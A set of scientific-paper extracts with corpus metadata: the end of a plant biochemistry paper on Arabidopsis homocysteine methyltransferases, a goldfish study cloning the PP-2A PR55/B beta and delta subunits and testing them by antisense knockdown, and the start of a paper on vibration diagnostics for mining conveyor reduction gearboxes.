AtHMT-1 and -2 resemble HMTs from other organisms in overall primary structure and in being monomeric proteins. They lack obvious targeting sequences and are therefore presumably cytosolic enzymes. HMT has yet to be definitively localized in plant cells, but preliminary work with pea leaves indicates that it is cytosolic, 3 as are other enzymes involved in Met metabolism, i.e. MMT, Met synthase, AdoMet synthetase, and AdoHcy hydrolase (8,32). AtHMT-1 and -2 share with other HMTs and with SecysMT, a GGCC zinc-binding motif (18), plus a third conserved cysteine residue. This strongly suggests that they have a zinc cofactor. Neither enzyme was stimulated by zinc or severely inhibited by EDTA, but this may be because the zinc is tightly bound, as it is in betaine-Hcy methyltransferase (19).
Our results demonstrate that the physiological S,S diastereomer of AdoMet is a substrate for plant HMTs. This indicates that plants have the potential to bypass SMM by transferring methyl groups directly from AdoMet to Hcy (Fig. 1, dotted arrows), and the complementation experiments with yeast confirm that plant HMTs can mediate this reaction in a foreign host. But how much flux does this bypass actually carry in planta? Kinetic considerations indicate that it may be very little, especially in tissues where AtHMT-1 is the predominant isoform. AtHMT-1 has K m values for SMM and AdoMet of 29 and 1950 M, respectively and the V max value with SMM is 2.8-fold higher. SMM levels are reported to range from about 5 to Ͼ300 nmol g Ϫ1 fresh weight in various tissues, and SMM/ AdoMet ratios are reported to range from Ϸ1 to Ͼ30 (1,8,(33)(34)(35)(36). Some SMM may be sequestered in the vacuole; however, radiotracer kinetic studies indicate that the metabolically active (presumably cytosolic) SMM pool is a large fraction of the total (36). Assuming the cytosol to be Ϸ5% of tissue water volume (37), it follows from these data that typical cytosolic SMM concentrations are likely to be Ն100 M, and AdoMet concentrations are likely to be similar or lower. In such conditions flux through the AdoMet-driven reaction would be Յ3% of that through the SMM-driven reaction. Simply put, a high prevailing SMM concentration can deny AdoMet access to the AtHMT-1 active site and thereby suppress futile cycling of AdoMet.
Our finding that AtHMT-1 is strongly inhibited by Met is 3 AtHMT-2 cDNA (B). Washing was at low stringency. The sizes of hybridizing bands match the cDNAs with respect to the predicted restriction sites. Genomic reconstruction standards were made with AtHMT-1 and -2 cDNAs equivalent to 1 and 5 copies/haploid genome (shown on the left of each panel). Note that AtHMT-1 and -2 cDNAs cross-hybridize only very weakly as they differ at 55% of the base pairs. The positions of DNA size markers (kb, kilobase) are marked. Abbreviations are as in Fig. 2. C shows a molecular phylogenic tree of the protein sequences from Fig. 2. novel, because the plant HMTs so far known are Met-insensitive (12,13). Met sensitivity may be crucial to the control of flux through the HMT reaction and the SMM cycle. A Met-sensitive HMT could stop the cycle turning when Met levels are elevated, whereas a Met-insensitive enzyme could allow SMM 3 Met conversion even when Met levels are high. It is therefore noteworthy that free Met levels in developing seeds can greatly exceed those in other tissues (Ն400 versus 10 -30 nmol g Ϫ1 fresh weight) (1, 35, 38 -40) and that HMTs isolated from seeds are Met-insensitive (12,13). Moreover, DNA array data indicate that the predominant HMT expressed in developing Arabidopsis seeds is the Met-insensitive AtHMT-2. 4 Another difference between the Arabidopsis HMTs is that AtHMT-1 attacks cysteine. This could explain the origin of S-methylcysteine in the Brassicaceae. No enzyme that catalyzes the Smethylation of cysteine has hitherto been demonstrated (1), although radiotracer data show that the reaction occurs in vivo (41).
The SMM cycle has been proposed to rectify overshoots in the conversion of free Met to AdoMet, thereby sustaining a free Met pool for protein synthesis (3). This hypothesis was based largely on data for whole Lemna plantlets (3), and it has since been found that SMM is transported between organs in the phloem (8). This raises the question of whether the SMM was produced and utilized in the same organs in the Lemna experiments and shows that accurate flux measurements are now needed to clarify the functions of the SMM cycle. Only a few such measurements have been made, and these come from unusual plants (W. biflora and Spartina alterniflora) that convert SMM to DMSP. Isotope tracer studies of SMM synthesis and metabolism in leaves of these plants showed that the methyl flux from Met to SMM was high, but there was little or none from SMM to Hcy, i.e. the SMM cycle turned slowly if at all (36,42). The approach used to make these measurements depends on the metabolism of SMM to DMSP and so unfortunately cannot be applied to the great majority of plants that do not synthesize DMSP.
There is thus a need for methods to estimate flux through the SMM cycle in tissues of non-DMSP-accumulating plants. Our finding that the enzymes of the cycle have opposing stereoselectivities suggests a novel way to do this. For example, consider an organ that imports SMM via the phloem and ultimately uses it to produce Met that is used for protein synthesis. If the SMM cycle is not operating, then supplied SMM that has a 13 C label in the C 4 backbone and the pro-R methyl and 2 H 3 label in the pro-S methyl will give rise to only two labeled species of Met in proteins: [methyl-2 H 3 , 13 C 4 ]Met and [methyl-13 C]Met. However, if the SMM cycle is operating, the additional species [methyl-2 H 3 ]Met, [ 13 C 4 ]Met, and [ 13 C 5 ]Met will be found in proteins and will become relatively more abundant with each turn of the cycle. | 2018-04-03T01:57:04.548Z | 2000-05-26T00:00:00.000 | {
"year": 2000,
"sha1": "2e003ff87b53d3475d7083efced0d62e18d8ab68",
"oa_license": "CCBY",
"oa_url": "http://www.jbc.org/content/275/21/15962.full.pdf",
"oa_status": "HYBRID",
"pdf_src": "Highwire",
"pdf_hash": "64eb5d7c40397c7e7f82f8f40e0aafbaa7ea2524",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Medicine",
"Biology"
]
} |
18652571 | pes2o/s2orc | v3-fos-license | Molecular Cloning of the Genes Encoding the PR55/Bβ/δ Regulatory Subunits for PP-2A and Analysis of Their Functions in Regulating Development of Goldfish, Carassius auratus
The protein phosphatase-2A (PP-2A), one of the major phosphatases in eukaryotes, is a heterotrimer, consisting of a scaffold A subunit, a catalytic C subunit and a regulatory B subunit. Previous studies have shown that besides regulating specific PP-2A activity, various B subunits encoded by more than 16 different genes, may have other functions. To explore the possible roles of the regulatory subunits of PP-2A in vertebrate development, we have cloned the PR55/B family regulatory subunits: β and δ, analyzed their tissue specific and developmental expression patterns in Goldfish ( Carassius auratus). Our results revealed that the full-length cDNA for PR55/Bβ consists of 1940 bp with an open reading frame of 1332 nucleotides coding for a deduced protein of 443 amino acids. The full length PR55/Bδ cDNA is 2163 bp containing an open reading frame of 1347 nucleotides encoding a deduced protein of 448 amino acids. The two isoforms of PR55/B display high levels of sequence identity with their counterparts in other species. The PR55/Bβ mRNA and protein are detected in brain and heart. In contrast, the PR55/Bδ is expressed in all 9 tissues examined at both mRNA and protein levels. During development of goldfish, the mRNAs for PR55/Bβ and PR55/Bδ show distinct patterns. At the protein level, PR55/Bδ is expressed at all developmental stages examined, suggesting its important role in regulating goldfish development. Expression of the PR55/Bδ anti-sense RNA leads to significant downregulation of PR55/Bδ proteins and caused severe abnormality in goldfish trunk and eye development. Together, our results suggested that PR55/Bδ plays an important role in governing normal trunk and eye formation during goldfish development.
Introduction
The reversible phosphorylation of proteins is an important posttranslational modification in eukaryotes [1][2][3] and an essential mechanism regulating functions of more than 30% total cellular proteins. 4,5 The protein phosphatase-2A (PP-2A) is one of the major phosphatases in eukaryotes, contributing to more than 50% serine/threonine phosphatase activity and participating in many cellular processes such as signal transduction, gene expression, neurotransmission, cell cycle control, cell transformation and senescence. [1][2][3][4][5][6][7] In this regard, our recent studies have indicated that PP2A is associated with carcinogenesis 8,9 and is highly regulated in ocular tissues. [10][11][12] The holoenzyme of PP-2A is a heterotrimer, consisting of a scaffold A subunit, a catalytic C subunit and a regulatory B subunit. [13][14][15][16] While the A and C subunits exist in two isoforms encoded by different genes, the B subunits exist in approximately 26 different isoforms and are encoded by four subfamilies of genes (B or PR55, B' or PR61, B'' or PR72, and B''' or PR93/PR110) and each family consists of multiple genes, with each gene generating multiple splice variants. 13,14 These B subunits exhibit differential subcellular localization as well as tissue-specific and developmentally-regulated expression patterns. Variations in their expression pattern and cellular localization of B subunits provide substrate specificity, which is thought to be the molecular basis for the appropriate regulation of numerous cellular processes. 1,2,[5][6][7]13,14 The major function of the regulatory subunits for PP-2A is to provide specific PP-2A activity in different cellular compartments and different tissues of organisms. 1,2,[5][6][7]13,14 In addition, these different regulatory subunits may have other functions independent of PP-2A. For example, SG2NA, a member of the B'" or PR93/110 family, has been shown to act as a molecular scaffold to promote localization of the estrogen receptor to the plasma membrane and organize the ER-eNOS membrane signaling complex in endothelial cells. 17 In addition, it is found that the Drosophila orthologue member of SG2NA named CKA can form a physical complex with several kinases including HEP, BSK, and components of AP-1 family including JUN and FOS. 18,19 To further explore the independent functions of the regulatory subunits of PP-2A, we have cloned two members of the PR55/B family from goldfish, established their tissues specific and developmental expression patterns. Moreover, we have designed antisense expression construct to block translation of the δ isoform and demonstrated that injection of the anti-sense RNA from PR55/Bδ significantly downregulates the expression of this regulatory subunit at several developmental stages. Furthermore, inhibition of PR55/Bδ expression via anti-sense RNA-mediated blockage of translation caused severe phenotype of the developing goldfish embryos including microphthalmia (small eye) and abnormal trunk. Thus, our results demonstrate that the PR55/Bδ plays an important role in regulating vertebrate organogenesis.
Materials and Methods Animals
The goldfish samples at the age of 6 months to one year were collected from the Experimental Fish Culture Facility of the Key Laboratory of the Educational Ministry of China in Hunan Normal University. And the fertilization was conducted at the laboratory.
chemicals
The RNA extraction kit was purchased from Omega, the reverse transcription kit from Invitrogen, Inc, the protein size marker from Fermentas. The 5′ and 3′ RACE cloning kit was obtained from the Clontech, Inc. The PCR Taq polymerase and the PMD18-T vector were purchased from Takara Inc. The antibodies used for this study were purchased from Santa Cruz Biotechnology and from Sigma, Inc. Gel purification kit and all the oligo primers were provided by Sangon, Inc.
collection of tissues and embryos
Goldfish were sacrificed through removal of the gill tissue. Various tissues including liver, spermary, ovary, brain, kidney, heart, muscle, gill and fin were quickly dissected out on ice and then frozen under liquid nitrogen for homogenization, first with a mortar and then with 1 ml syringe (18.5 G and 23.5 needles passed). Artificial fertilization was conducted in Hoff's solution (0.1 g CaCl 2 , 0.05 g KCl, 3.5 g NaCl dissolved in 1000 ml distilled H 2 O). The fertilized egg membranes were removed with 0.4% pancreatic protease and the de-membraned eggs were allowed to develop at 22 °C in Hoff's solution. Under microscopic examination, the developing embryos at stages of 2-cell, multiple-cell, blastula, gastrula, neurula, optical vesicle, brain differentiation, muscle differentiation, heart beat, eye pigmentation, body pigmentation and hatching larvae were collected and frozen under liquid nitrogen. The frozen embryos were homogenized for extraction of total RNA and proteins as described below.
Molecular cloning of the PR55/B family of PP2A The two cDNAs for PR55/Bβ/δ were cloned using 5′-RACE and 3′-RACE as previously described. 9,20 Briefly, the specific primers used to clone these cDNAs were designed using Jellyfish and prime 5.0 softwares and were shown in Table 1. The homology-based reverse transcriptasepolymerase chain reaction (RT-PCR) cloning was used to isolate partial B subunit cDNAs from total adult goldfish brain RNA. Additional 5′ sequences for B subunits were obtained by 5′ rapid amplification of cDNA ends (5′-RACE) from goldfish brain RNA according to instructions supplied with the Marathon cDNA amplification kit (Clontech, Inc.). 3′ Race was performed using 3′-RACE kit.
Reverse transcription-linked polymerase chain reaction (RT-PcR)
The reverse transcription was conducted with a kit from Invitrogen (Invitrogen #18085-019) as previously described. 8,9,[20][21][22] Briefly, 2 µg of total RNA were used in a total reaction volume of 20 µl and 2 µl of the reverse transcription reaction mixture were used for PCR reaction. To detect the mRNA expression of PR55/Bβ/δ, three pairs of specific primers as well as the β-actin primers (Table 1) were used. For PCR amplification, both specific primers and β-Actin primers were added into the same reaction at the beginning of PCR, and the PCR reaction was continued 30 cycles. At the end of each reaction, the PCR products were separated by agarose gel (1.5%) electrophoresis and photographed under UV illumination.
Western blot analysis
Western blot analysis was conducted as previously described. [8][9][10]23 Briefly, 50 or 100 µg of total proteins from various tissues and each developmental stage of embryos were separated by 10% SDS-polyacrylamide gel electrophoresis and transferred into supporting nitrocellulose membranes (Bio-Rad). The protein blots were blocked with 5% milk in TBS (10 mM Tris, pH 8.0; 150 mM NaCl) for 60 minutes at normal room temperature. Then, each blot was incubated with the anti-B55β/δ antibodies (Santa Cruz Biotechnology) at a dilution of 1:100 in 5% milk prepared in TBS overnight at 4 °C with mild shaking. After washing 3 times with TBS-T (TBS with 0.05% Tween-20), 15 minutes for each, the blot was incubated with a secondary antibody (anti-rabbit IgG from Santa Cruz Biotechnology) at a dilution of 1 to 1000 for 45 minutes. After washing twice with TBS-T and once with TBS (15 minutes each), the PR55 proteins were detected with an enhanced chemiluminescence detection kit according to the instruction manual from Amersham.
As reference, after stripping the previous antibody, the blot was re-hybridized with the anti-β-actin primary antibody (1:2000 from Sigma, Inc.). After washing with TBST 3 times, the blot was incubated with the anti-mouse IgG (secondary antibody from GE Health Care, Inc. diluted in 1:1000). After washing with TBST twice times and TBS one time, the β-actin level was detected as described above.
Quantitation of RT-PcR and Western blot results
After RT-PCR, the relative density of each specific band verse β-actin control band was quantitated as described before. 24 Both RT-PCR and Western blot results in the x-ray films were analyzed with the Automated Digitizing System from the Silk Scientific Corporation. The relative expression levels (fold) were calculated by dividing the total pixel from each band under investigation by the total pixel from the corresponding β-actin band. The quantitative data Table 1. Oligo primers used for RT-PcR analysis to detect expression of PR55/Bβ/δ.
Forward primer
Reverse primer averaged from three independent experiments and statistics were analyzed by students' t-test.
Preparation of antisense expression construct for PR55/Bδ
The full-length cDNA for PR55/Bδ was cloned into the pEGFP vector in a reverse direction so that the anti-sense strand will be expressed under the direction of the viral promoter as previously described. 25 The pEGFP vector alone was used as mock.
injection of plasmids and observation of the injected embryos development
Both vector and anti-sense expression vector were amplified in DH-5α, and then purified through maximal plasmid purification kit (Qiagen) according to the instruction manual. The 500 ng of purified plasmids in 0.05 µl were injected into each fertilized egg using a microinject developed by Shanghai Instrument, Inc. The vector-injected embryos and the antisense expression construct-injected embryos were allowed to develop at 22 °C in Hoff's solution. The wound embryos were removed from the experiments. The phenotypes of each developmental stage were recorded with microscopy ( Table 2).
Molecular cloning of the PR55/Bβ/δ cDNAs of PP-2A from goldfish
Using a molecular strategy as previously described, 9,20 the full-length cDNAs for PR55/Bβ and PR55/Bδ were isolated. These cDNA sequences were deposited to gene bank database with the access numbers of FJ356012 and FJ356011 for PR55β and PR55δ, respectively. Sequence analysis revealed that the full-length PR55/Bβ cDNA consists of 1940 bp, with an open reading frame of 1332 nucleotides coding for a deduced protein of 443 amino acids (Fig. 1A). Amino acid sequence alignment showed that goldfish PR55β shares high levels of identity to those from African clawed frog (88.4%), mouse (92.2%) and human (92.5%) (Figs. 1B and 3B). The full-length PR55/Bδ cDNA contains 2163 bp with an open reading frame of 1347 nucleotides, which encodes a deduced protein of 448 amino acids ( Fig. 2A). The amino acid sequence alignment demonstrated that the goldfish PR55δ protein shared a sequence identity of 98.4%, 87.7%, 86.9%, 86.9% and 86.9% with those from zebrafish, western clawed frog, chicken, mouse and Norway rat, respectively. (Figs. 2B and 3C).
Analysis of the amino acid sequence in the deduced protein PR55/Bβ/γ/δ of PP-2A through both ExPASy and the conserved domain architecture retrieval tool (DART) revealed presence of the WD-40 tandem repeats in all three isoforms (Boxed regions in Figures 1A and 2A, and data not shown), indicating the functional importance for their binding to the scaffold subunits of PP-2A. 12,15,16,21,22,26 Moreover, an 80.8% of sequence identity between PR55/Bβ and PR55/Bδ were found (Fig. 3A). In addition, the N-termini in PR55/Bβ and PR55/Bδ are significantly diversified (Fig. 3A).
Tissue specific expression of PR55/B family members
To explore the potential functions of PR55/B family members in various tissues of the lower vertebrates, we examined the mRNA levels for PR55/Bβ/δ of PP-2A in liver, spermary, ovary, brain, kidney, heart, muscle, gill and fin from goldfish using reverse transcription-linked polymerase chain reaction (RT-PCR) analysis. As shown in Figure 4A, a band of 370 bp cDNA was amplified using specific primers for PR55/Bβ in two tissues: high level of expression in brain and low level of expression in heart. Similarly, a single band of 372 bp was amplified in all tissues examined for PP2A/Bδ (Fig. 4B). Among these tissues, brain, ovary and kidney contained the highest levels of PR55/Bδ mRNA expression (Fig. 4B). In comparison with brain, ovary and kidney, muscle and heart displayed a slight decrease in PR55/Bδ mRNA expression, and fin, gill, spermary and liver showed further decrease.
To further explore the tissue-specific distribution of PR55/Bβ/δ, we conducted western blot analysis. As shown in Figure 5A, PR55/Bβ protein was detected at relatively high level in the brain tissue but much attenuated in the heart. All other tissues have no detectable PR55/Bβ protein. In contrast to PR55/Bβ, the PR55/Bδ was highly expressed in the brain and heart, moderately expressed in liver, spermary, ovary, muscle, fin and gill, and the lowest level detected in kidney (Fig. 5B).
Developmental expression patterns of PR55/Bβ/δ
To explore the possible function of the PR55/Bβ/δ during goldfish development, we first determined their developmental expression patterns at both mRNA ( Fig. 6) and protein (Fig. 7) levels. Through RT-PCR analysis, we demonstrated that PR55/Bβ mRNA level was relatively low from two-cell, multiple-cell to blastula stage. This mRNA level was substantially increased at the gastrula stage transiently, then dropped down at the neurula stage. From the optic vesicle, through brain and muscle differentiation, to heart beat, the PR55/Bβ mRNA became gradually increased. And it maintained relatively stable at this level in the next four different stages of development (Fig. 6A). Different from the expression pattern of PR55/Bβ mRNA (Fig. 6A), the PR55/Bδ mRNA, in the very first three stages of development, displayed the highest level, then slightly dropped down from gastrula to neurula stages, gradually increased from optical vesicle stage to brain differentiation stage, maintained at this level at muscle differentiation and heart beat stages, and became gradually decreased from eye pigmentation, to hatching larval stages (Fig. 6B).
To further confirm the developmental expression of PR55/Bβ/δ at the protein level, we have conducted western blot analysis. As shown in Figure 7A, PR55/Bβ protein seems to be undetectable at any stage of development. In contrast, the PR55/Bδ protein was maintained at similar levels in the 8 different stages examined: multiple-cell, blastula, gastrula, neurula, optic vesicle, brain differentiation, eye pigmentation, body pigmentation and hatching (Fig. 7B).
Attenuation of PR55/Bδ protein expression led to severe abnormality in eye development of goldfish To further confirm the role of PR55/B family subunit in regulating development of goldfish, we constructed an expression construct for the generation of the antisense strand RNA from the PR55/Bδ cDNA. Basically, the full length cDNA of PR55/Bδ was ligated into the pEGFP-C3 vector in the non-coding direction so that the anti-sense RNA would be generated when injected into fertilized eggs. The empty vector was used as mock injection. Expression of the antisense PR55/Bδ RNA substantially attenuated the translated level of PR55/ Bδ protein at several developmental stages examined (Figs. 8A and 8B). When PR55/Bδ protein level was significantly downregulated, the development of the goldfish displayed severe phenotype in both trunk and eye (Fig. 8D) in comparison with those in the normal larvae (Fig. 8C). The trunk was severely bent and the eye appeared in much small size (microphthalmia) (Fig. 8D Table 2) in comparison with the vector-injected embryos (Fig. 8C). Thus, our results demonstrate that PR55/Bδ is important for goldfish organogenesis, especially the trunk and the eye.
Discussion
In the present study, we have demonstrated: 1) The goldfish PR55/Bβ/δ cDNAs contain ORFs of 1332 bp and 1347 bp, coding for the deduced proteins of 443 PR55/Bβ and 448 PR55/Bδ amino acids, respectively; 2) the deduced goldfish PR55/Bβ protein share an amino acid identity of 88.4%, 92.5% and 92.5% to that from frog, mouse and human, respectively; the deduced goldfish PR55/Bδ protein share an amino acid identity of 98.4%, 87.7%, 86.9%, 86.9% and 86.9% to that from zebrafish, frog, chicken, mouse and rat, respectively; 3) the PR55/Bβ mRNA is present in brain and heart only, and the PR55/Bδ contrast expression patterns of PR55/Bβ/δ are present in lower and higher vertebrate The protein phosphatase-2A (PP-2A) is one of the major phosphatases in eukaryotes, and the holoenzyme of PP-2A is a heterotrimer, which contains a scaffold A subunit, a catalytic C subunit and a regulatory B subunit. [1][2][3][4][5][6][7] Both A and C subunits exist in two isoforms which are encoded by different genes. In contrast, the B subunits exist in 26 or more isoforms and so far, four subfamilies of genes, PR55/B, PR61/B', PR72/B", and PR93/PR110/B'" have been identified to code for these different isoforms. 1,2,6,15,16 In the present studies, we have isolated two members of the PR55/B family from goldfish. Although each member of the goldfish Figure 3. A) Amino acid sequence alignment of the PP2A-PR55/B family members, β/γ/δ in goldfish (The partial amino acid sequence for PR55/Bβ is non-published data from Zhao et al). The completely conserved region among the three isoforms is marked by black shadow. The less conserved region is marked by grey shadow and the non-conserved region is revealed by white background. B) and c) the corresponding phylogenetic trees of the PR55/BβB ֵ and PR55/Bδ (c) from four (B) or six (c) vertebrates. The phylogenetic tree for PR55/Bβ (B) was generated through comparative analysis of the coding sequences in human, mouse, frog and the present study using UPGMA calculation and the MeGA3.1 software. The phylogenetic tree for PR55/Bδ (c) was generated using the same strategy and software through comparative analysis of the coding sequences from mouse, rat, chicken, frog, zebrafish and the present study.
PR55/B family shares high levels of amino acid identity (from 70% to 98%) with the counterpart from other vertebrates (Fig. 3), their expression patterns may be substantially different in different vertebrates. In the present study, we demonstrate that the goldfish PR55/Bβ mRNA is mainly expressed in the brain and to a much less degree in the heart. However, in mouse and rat, it is mainly expressed in testis and to a less degree in murine brain. 27,28 For the expression pattern of PR55/Bδ, there is significant difference between goldfish and murine. While in goldfish, PR55/Bδ mRNA is expressed in all 8 tissues examined with the highest level found in brain, ovary and kidney, and the lowest level in liver and testis (spermary), the high level of PR55/Bδ mRNA is only detected in mouse testis, the remaining tissues either have very little PR55/Bβ mRNA (kidney, muscle, liver and brain) or no PR55/Bδ mRNA (lung, spleen and heart). [27][28][29] Thus, goldfish (lower vertebrate) and murine (higher vertebrate) display distinct difference in the tissuespecific expression patterns of PR55/Bβ/δ.
In the present study, we found that the PR55/Bβ mRNA was present at low levels at the first 3 stages and then became clearly upregulated at gastrulation stage. After a brief downregulation in neurula and optic vesicle stages, the PR55/Bβ mRNA were gradually increased from optic vesicle to heart beat stages and then maintained at this level with some slight fluctuations in the next three stages. Similar to Methods. Bottom panel: quantitative results of PR55/Bβ protein in the above 9 tissues of the adult goldfish from three independent experiments. note that the highest expression levels of the PR55/Bβ protein was detected in the brain, and to a much less degree in the heart. B) Up panel: 100 µg of total proteins extracted from the 9 different tissues of the adult goldfish were subjected Western blot analysis as described in A. Bottom panel: quantitative results of PR55/Bδ protein in the above 9 tissues of the adult goldfish from three independent experiments. Note that the highest expression levels of the PR55/Bδ protein was detected in the brain and heart, and a reduced level of this protein was detected in liver, spermary, ovary, gin and gill. A much reduced PR55/Bβ/δ protein expression was found in kidney.
the temporal mRNA expression pattern in goldfish, the PR55/Bβ mRNA was also detected in mouse embryo, as early as embryonic day 11 (ED11). This mRNA level became gradually increased from ED 11 to ED 17. 28 In contrast to the goldfish PR55/Bβ mRNA expression pattern, we hardly detected any PR55/Bβ protein expression at the 12 different developmental stages examined. Such results suggest that the PR55/Bβ mRNA may be non-translatable and the specific PP-2A activity with PR55/Bβ as regulatory subunit may be not necessary for goldfish development. Whether the PR55/Bβ mRNA in mouse embryo yields any detectable protein remains to be explored. On the other hand, we could not exclude the possibility that a low level of PR55/Bβ protein exists that cannot be detected with the antibody we used and in the presence of a large portion of yolk protein in goldfish embryo. Different from the PR55/ Bβ the PR55/Bδ is highly expressed at both mRNA and protein levels from early to later developmental stages of goldfish. This temporal pattern is also different from that in mouse where no PR55/Bδ transcripts could be detected until ED17. 28 Such distinct difference in their temporal expression patterns between lower and higher vertebrates suggest that PR55/Bδ plays an important role in regulating development of goldfish embryo but not mouse embryo before ED17.
The discrepancy of the mRNA and protein levels for PR55/Bδ in goldfish kidney (Figs. 5 and 6) 30 It has been shown that Drosophila mutants with reduced levels of PR55 expression display pleiotropic phenotypes. 31 Although three mutant alleles, aar 1 , aar 2 and twins P , derived from the insertion of different P-elements at the same position within the PR55 gene all show mitotic abnormalities in anaphase, aar 1 displays abnormality in larval brain, aar 2 is female sterile, and twins P shows imaginal disc abnormality. [32][33][34] The imaginal disc duplication observed in twins P is derived from complete loss of PR55/B expression. 34 These quantitative results of PR55/Bδ protein in the 8 developmental stages as determined using the methods described in Figure 5. of the later. 35 It has been extensively used for suppression of endogenous gene expression. [36][37][38] Western blot analysis confirmed that expression of the anti-sense RNA substantially attenuated the protein expression level of PR55/Bδ in goldfish embryos of different developmental stages (Fig. 8A & 8B). When PR55/ Bδ is downregulated, the development of goldfish embryos displays severe abnormality in organogenesis. We observed that during differentiation stage, while expression of the vector (mock) had little effect on the eye development, expression of the antisense PR55/Bδ RNA led to microphthalmia and abnormal trunk in the embryos with reduced PR55/Bδ expression of majority embryos ( Table 2). These results provide the first evidence that the regulatory subunit of PP-2A directly controls eye and trunk development.
Our demonstration that downregulation of PR55/Bδ by anti-sense RNA led to microphthalmia (small eye) in the developing embryo suggests the specific PP-2A activity contributed by PR55/Bδ regulatory subunit is crucial for development. In this case, the PP-2A containing PR55/Bδ regulatory subunit may modulate a set of specific targets important for development that can't be dephosphorylated by PP-2A with non-PR55/ Bδ regulatory subunit. Indeed, previous studies have shown that such proteins as cdc25, histone H1 and caldesmon phosphorylated by p34 cdc2 /cyclinB kinase are only subjected to dephosphorylation by the specific PP-2A containing PR55/B regulatory subunit. 31,[39][40][41][42] In addition, the PP-2A containing PR55/B regulatory subunit also regulates targets phosphorylated by MAP kinases such as the microtubule-associated protein, tau. 43,44 On the other hand, we could not rule out the possibility that the PR55/Bδ regulatory subunit alone functions in some unknown mechanism to govern goldfish development. Whether the later case is possible is currently under investigation.
publish with Libertas Academica and every scientist working in your field can read your article "I would like to say that this is the most author-friendly editing process I have experienced in over 150 publications. Thank you most sincerely." "The communication between your staff and me has been terrific. Whenever progress is made with the manuscript, I receive notice. Quite honestly, I've never had such complete communication with a journal." "LA is different, and hopefully represents a kind of scientific publication machinery that removes the hurdles from free flow of scientific thought." Your paper will be: • Available to your entire community free of charge • Fairly and quickly peer reviewed • Yours! You retain copyright http://www.la-press.com | 2014-10-01T00:00:00.000Z | 2010-12-20T00:00:00.000 | {
"year": 2010,
"sha1": "55c736e7c690262a290f0159bce1b71e682b2853",
"oa_license": "CCBYNC",
"oa_url": "http://journals.sagepub.com/doi/pdf/10.4137/GRSB.S6065",
"oa_status": "HYBRID",
"pdf_src": "PubMedCentral",
"pdf_hash": "55c736e7c690262a290f0159bce1b71e682b2853",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
219008579 | pes2o/s2orc | v3-fos-license | The Development of Digital Technologies in Mining Machinery Technical Maintenance
Methods of functional diagnostics for technical conditions of rolling element bearings are studied in the paper. Their strengths and shortcomings are revealed. The model of shock pulses formation in the event of faults in the rolling element bearings is built. The possibility to apply wavelet-transformation for detecting these faults and defining technical condition of mining machinery assembly units is introduced.
Introduction
At present a great deal of time due to objectively reasonable causes industrial enterprises devote to the issues of improving the reliability, operating efficiency and maintenance of the processing equipment. These issues are vital, particularly, for hazardous production facilities such as coal and metal mining industry. The reason is in changes of approaches towards mining and conveyor equipment operation as the machinery and technological processes become more sophisticated, and the requirement towards industrial and environmental safety toughens. Great number of various machine modules have a concealed nature of faults origin and development generated within the period of their operation. This may cause accident events accompanied by significant economic and social damages and air pollution. The number of contemporary technogenic accidents and disasters of various scales [1] made it necessary to redefine the requirements towards reliable assessment of machinery condition and defining its residual operation life taking into account the latest scientific achievements in technical diagnostics [2,3].
On the other hand, the majority of the enterprises under the condition of cost and budget cuttings come up against a dire necessity of decreasing the expenses. It also touches the issues of production modernization, repair and technical maintenance of main and auxiliary equipment as the share of operating equipment components and assemblies is in a worn-out state with significantly exhausted residual operation time level [4]. Under such condition, it is important that the cost minimization solution does not influence negatively on the machinery operation reliability. It is possible only if one can obtain accurate data on technical condition of the equipment and these data are obtained using different methods of technical diagnostics [5][6][7][8][9]. Any modern industrial enterprise pays close attention to improving its profitability by means of effective management of its business assets applying optimal strategy for repairing and technical maintenance. Russian and foreign industrial enterprise practices demonstrate that justified cost reduction on technical maintenance without At present, coal producers apply a significant number of extensible belt conveyers [10] and operating indices of the whole coal industry of Kuzbass depend on their good operating condition. In the short run, the increase of power availability and technical extensiveness of belt conveyers together with their performance and rock mass transportation distance is expected. One can see a large-scale application of variable-frequency electric drives [11,12].
The increasing volumes of underground coal production require the creation of reliable transportation systems and it is the main issue, which the producers of coal mining extensible belt conveyer process lines should solve. Another, no less important issue is their technical maintenance costs reduction [13]. To provide faultless operation of the belt conveyer for the prolonged period of time the reasons which may cause the failure of different components [14] and especially of toothed gearings and bearing systems the life duration of which is judged by the sliding surface mechanical wear, should be defined.
Setting the task
The analyses of stand-by times caused by main and face conveyer reduction gear failures [15] shows that their share varies from 7 percent to 18 percent while the mean time for restoring normal operation makes it from 24 to 48 hours. All these prove the relevance of the researches.
Vibration monitoring method proved to be a reliable one for controlling technical condition of the mechanical equipment [5,16,17]. Vibration-based diagnostics is applied: for controlling current condition of the equipment; for dividing manifold admissible technical conditions of machines into two subsets -working and defective; for diagnosing that consists in defining the character and localization of one or a group of failures that correspond to the machine vibratory condition; for detecting possible failures at the early stage or predicting their temporal evolution; for estimating residual operation time; for defining repair time and volume; for reducing the risk of accidents. The experience of monitoring technical condition of mining equipment indicates that to detect potential wear-out failures is more effective (to 77 percent) while applying the vibration parameters analysis [16] and if supported by other functional diagnostics methods such as oil spectral analysis [17] and thermal-imaging monitoring the accuracy of detecting the reason of faults increases to 95 percent.
Overall technical condition analysis of a reduction gear box after it has been assembled and tested by a testing facility (figure 1) will allow both detecting and isolating manufacturing faults and defects and preventing from delivering defective products to a consumer. Moreover, the obtained data can serve as a basis for the development of automated quality control system.
The analysis of vibration monitoring methods allows concluding that it is advantageous to apply spectrum-mask method (spectral plots) as a method for controlling output products of the coal industry. The idea of this method is in the fact, that the faults formed as a result of manufacturing and assembly works generate the vibration in specific frequency bands with definite magnitude relation of the controlled parameters.
Spectrum-mask method allows install the width of the frequency band, its position and evaluation criteria values which are compared with current values randomly. Analyzing the changes of the controlled parameter in a frequency band (the number of the bands can vary from 6 to 30) the evaluation and forecasting of the equipment condition is fulfilled [19]. The captured data on all the types of the produced reduction gear boxes were statistically processed for every type of the reduction gear box in the form of maximum permissible level of a root mean square vibration speed [Ve] and spectral mask for each control point in three orthogonally related directions. For example, figure 2 presents the results of RKC-400 reduction gear box test run. It is done in the form of energy spectrum registered in axial direction in control point four. Applying modern methods for machinery health monitoring allows practicing individual approach towards each manufactured machinery device while evaluating its technical condition and setting threshold values for its initial, functional and limit states.
Basic problems of mechanic faults in mining equipment (out-of-balance condition, misalignment, gear drive defects etc.) as a rule bring about the problems of bearing elements functioning in different power-driven, transforming and operating mechanisms of rolling element bearings.
